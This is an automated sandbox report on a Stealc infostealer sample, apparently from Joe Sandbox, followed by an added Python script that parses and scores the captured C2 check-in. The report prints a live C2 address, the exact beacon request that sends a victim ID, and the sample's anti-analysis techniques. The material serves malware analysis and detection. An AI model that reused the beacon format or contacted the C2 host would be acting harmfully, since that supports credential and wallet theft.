Windows Analysis Report
XDPT5mgIBO.exe

Overview

General Information

Sample name: XDPT5mgIBO.exe
(renamed because the original name is a hash value)
Original sample name: 6764f657774334189cbecc80dbb3c855.exe
Analysis ID: 1527619
MD5: 6764f657774334189cbecc80dbb3c855
SHA1: 9f597f7e92400f0c83f6166d1ec4a9228b3c5514
SHA256: ef31a45fb90a7cae12898b6f16cf2c48c06d75ca03f5aaf4fc48bbbd1385be11
Tags: 32, exe, trojan

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers (sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll), then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: XDPT5mgIBO.exe Avira: detected
Source: http://185.215.113.37/ URL Reputation: Label: malware
Source: http://185.215.113.37 URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php URL Reputation: Label: malware
Source: 0.2.XDPT5mgIBO.exe.640000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/ws Virustotal: Detection: 16%
Source: XDPT5mgIBO.exe Virustotal: Detection: 53%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: XDPT5mgIBO.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_0064C820
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00647240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00647240
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00649AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00649AC0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00649B60 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00649B60
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00658EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00658EA0
Source: XDPT5mgIBO.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_006538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_006538B0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00654910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00654910
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0064DA80
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0064E430
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00654570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00654570
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0064ED20
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0064BE70
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0064DE10
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_006416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006416D0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00653EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00653EA0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0064F6B0

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 31 32 31 33 41 45 32 44 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 2d 2d 0d 0a Data Ascii: ------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="hwid"711213AE2D294266498721------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="build"doma------EGIJEBGDAFHIJJKEHCAA--
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00644880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00644880
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 31 32 31 33 41 45 32 44 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 2d 2d 0d 0a Data Ascii: ------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="hwid"711213AE2D294266498721------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="build"doma------EGIJEBGDAFHIJJKEHCAA--
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp, XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001402000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&F
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.G
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php09
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpO9
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e9
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/ws
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37d
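The POST shown above is the first beacon: a multipart/form-data body carrying only a victim identifier (hwid) and the build name (build=doma, the same value the configuration extractor reports as "Botnet"), sent to a 16-hex-character .php gate with no User-Agent header. The following script is an added example, not Joe Sandbox, Suricata or Stealc code: it rebuilds the request byte-for-byte from the headers and Data Raw hex in this report, parses the multipart body, and scores the traffic against indicators taken from this capture. The scoring rules (gate path shape, boundary of four dashes plus 20 uppercase letters, missing User-Agent, exactly the two fields hwid and build) are generalised from this single sample and are assumptions, not a published signature; the benign control request and its host are constructed.

```python
"""Parse and score the Stealc C2 check-in captured in this report.

Added example (not Joe Sandbox, Suricata or Stealc code). The request is
reconstructed from the headers and "Data Raw" hex shown above; the scoring
rules generalise this one capture and are assumptions, not a signature.
"""
import re
from typing import Dict, List, Tuple

# Reconstructed from the report: same bytes as the Data Raw hex (211 bytes).
STEALC_CHECKIN = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAA\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------EGIJEBGDAFHIJJKEHCAA\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"711213AE2D294266498721\r\n"
    b"------EGIJEBGDAFHIJJKEHCAA\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"doma\r\n"
    b"------EGIJEBGDAFHIJJKEHCAA--\r\n"
)

# Constructed benign control (hypothetical host): an ordinary browser upload.
_BENIGN_BODY = (
    b"------WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
    b'Content-Disposition: form-data; name="comment"\r\n\r\n'
    b"hello\r\n"
    b"------WebKitFormBoundary7MA4YWxkTrZu0gW--\r\n"
)
BENIGN_UPLOAD = (
    b"POST /upload.php HTTP/1.1\r\n"
    b"Host: example.invalid\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
    + b"Content-Length: %d\r\n\r\n" % len(_BENIGN_BODY)
    + _BENIGN_BODY
)


def parse_http_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers, body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def boundary_from_content_type(content_type: str) -> str:
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("multipart without boundary")
    return m.group(1)


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Minimal multipart/form-data parser (RFC 7578): field name -> value."""
    delim = b"--" + boundary.encode("ascii")
    fields: Dict[str, bytes] = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):      # closing delimiter "--boundary--"
            break
        part_head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', part_head)
        if m:
            # drop the CRLF that precedes the next delimiter
            fields[m.group(1).decode("ascii")] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def score_checkin(raw: bytes) -> Dict[str, object]:
    """Extract the beacon fields and list which Stealc-style indicators match."""
    method, path, headers, body = parse_http_request(raw)
    hits: List[str] = []
    if method == "POST" and re.fullmatch(r"/[0-9a-f]{16}\.php", path):
        hits.append("POST to /<16 hex>.php gate")
    if "user-agent" not in headers:
        hits.append("no User-Agent header")
    fields: Dict[str, bytes] = {}
    ctype = headers.get("content-type", "")
    if ctype.startswith("multipart/form-data"):
        boundary = boundary_from_content_type(ctype)
        if re.fullmatch(r"-{4}[A-Z]{20}", boundary):   # assumed from this capture
            hits.append("boundary is four dashes + 20 uppercase letters")
        fields = parse_multipart(body, boundary)
        if set(fields) == {"hwid", "build"}:
            hits.append("first beacon carries only hwid and build")
    return {
        "path": path,
        "fields": {k: v.decode("ascii", "replace") for k, v in fields.items()},
        "indicators": hits,
        "stealc_like": len(hits) >= 3,   # assumed threshold
    }


if __name__ == "__main__":
    for name, req in (("captured", STEALC_CHECKIN), ("benign", BENIGN_UPLOAD)):
        print(name, score_checkin(req))
```

Run against the captured request this yields hwid 711213AE2D294266498721, build doma and all four indicators; the benign upload matches none. The hwid and build values are the pivot points for hunting: the same build name recurs across victims of one campaign, and the gate path plus the no-User-Agent POST is what the Suricata rule cited above (2044243) keys on in the traffic.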

System Summary

Source: XDPT5mgIBO.exe Static PE information: section name:
Source: XDPT5mgIBO.exe Static PE information: section name: .rsrc
Source: XDPT5mgIBO.exe Static PE information: section name: .idata
Source: XDPT5mgIBO.exe Static PE information: section name:
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C4888 0_2_009C4888
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A 0_2_00A0D02A
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A12074 0_2_00A12074
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_008BF870 0_2_008BF870
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_008DE9CC 0_2_008DE9CC
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_008E09E9 0_2_008E09E9
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009222A7 0_2_009222A7
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A09A41 0_2_00A09A41
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A13B86 0_2_00A13B86
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00933B55 0_2_00933B55
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A10C87 0_2_00A10C87
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A06487 0_2_00A06487
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009DFCFC 0_2_009DFCFC
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_008EFCF6 0_2_008EFCF6
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A5545A 0_2_00A5545A
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A155A1 0_2_00A155A1
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009F6DCC 0_2_009F6DCC
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009A05FD 0_2_009A05FD
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00911E8B 0_2_00911E8B
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00AA5E2F 0_2_00AA5E2F
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0B602 0_2_00A0B602
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0096363F 0_2_0096363F
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C8FCF 0_2_009C8FCF
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A07FCF 0_2_00A07FCF
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: String function: 006445C0 appears 316 times
Source: XDPT5mgIBO.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: XDPT5mgIBO.exe Static PE information: Section: ogawuknu ZLIB complexity 0.9949054810160024
Source: XDPT5mgIBO.exe Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: XDPT5mgIBO.exe, 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, XDPT5mgIBO.exe, 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00659600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00659600
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00653720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00653720
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\OD4RT2OV.htm
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: XDPT5mgIBO.exe Virustotal: Detection: 53%
Source: XDPT5mgIBO.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: XDPT5mgIBO.exe Static file information: File size 1852416 > 1048576
Source: XDPT5mgIBO.exe Static PE information: Raw size of section ogawuknu (0x19e000) exceeds 0x100000

Data Obfuscation

Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Unpacked PE file: 0.2.XDPT5mgIBO.exe.640000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ogawuknu:EW;hgmhlbrt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ogawuknu:EW;hgmhlbrt:EW;.taggant:EW;
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00659860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00659860
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: XDPT5mgIBO.exe Static PE information: real checksum: 0x1c74d3 should be: 0x1cbc26
Source: XDPT5mgIBO.exe Static PE information: section name:
Source: XDPT5mgIBO.exe Static PE information: section name: .rsrc
Source: XDPT5mgIBO.exe Static PE information: section name: .idata
Source: XDPT5mgIBO.exe Static PE information: section name:
Source: XDPT5mgIBO.exe Static PE information: section name: ogawuknu
Source: XDPT5mgIBO.exe Static PE information: section name: hgmhlbrt
Source: XDPT5mgIBO.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00B010A0 push edx; mov dword ptr [esp], ecx 0_2_00B010BD
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C4888 push 784E2553h; mov dword ptr [esp], ebx 0_2_009C4940
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C4888 push eax; mov dword ptr [esp], esp 0_2_009C496B
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C4888 push ebp; mov dword ptr [esp], 29AF872Dh 0_2_009C4A13
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C4888 push esi; mov dword ptr [esp], eax 0_2_009C4A87
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_009C4888 push edx; mov dword ptr [esp], ebp 0_2_009C4A8B
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0065B035 push ecx; ret 0_2_0065B048
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A750FF push 1249C73Bh; mov dword ptr [esp], edx 0_2_00A75123
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00ADD028 push 3FE43887h; mov dword ptr [esp], esi 0_2_00ADD031
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00ADD028 push edx; mov dword ptr [esp], ebx 0_2_00ADD03A
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 150092ECh; mov dword ptr [esp], esp 0_2_00A0D049
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 3F4DC2A3h; mov dword ptr [esp], esi 0_2_00A0D141
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 3D8497E0h; mov dword ptr [esp], edi 0_2_00A0D16E
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 6D32BA32h; mov dword ptr [esp], ebx 0_2_00A0D1A8
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push ecx; mov dword ptr [esp], ebp 0_2_00A0D240
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 63C14947h; mov dword ptr [esp], esi 0_2_00A0D259
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 08FE84AAh; mov dword ptr [esp], ecx 0_2_00A0D2B1
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 45E89993h; mov dword ptr [esp], esi 0_2_00A0D314
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 15A22B5Ch; mov dword ptr [esp], edx 0_2_00A0D3A7
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push edi; mov dword ptr [esp], 4977C910h 0_2_00A0D3EA
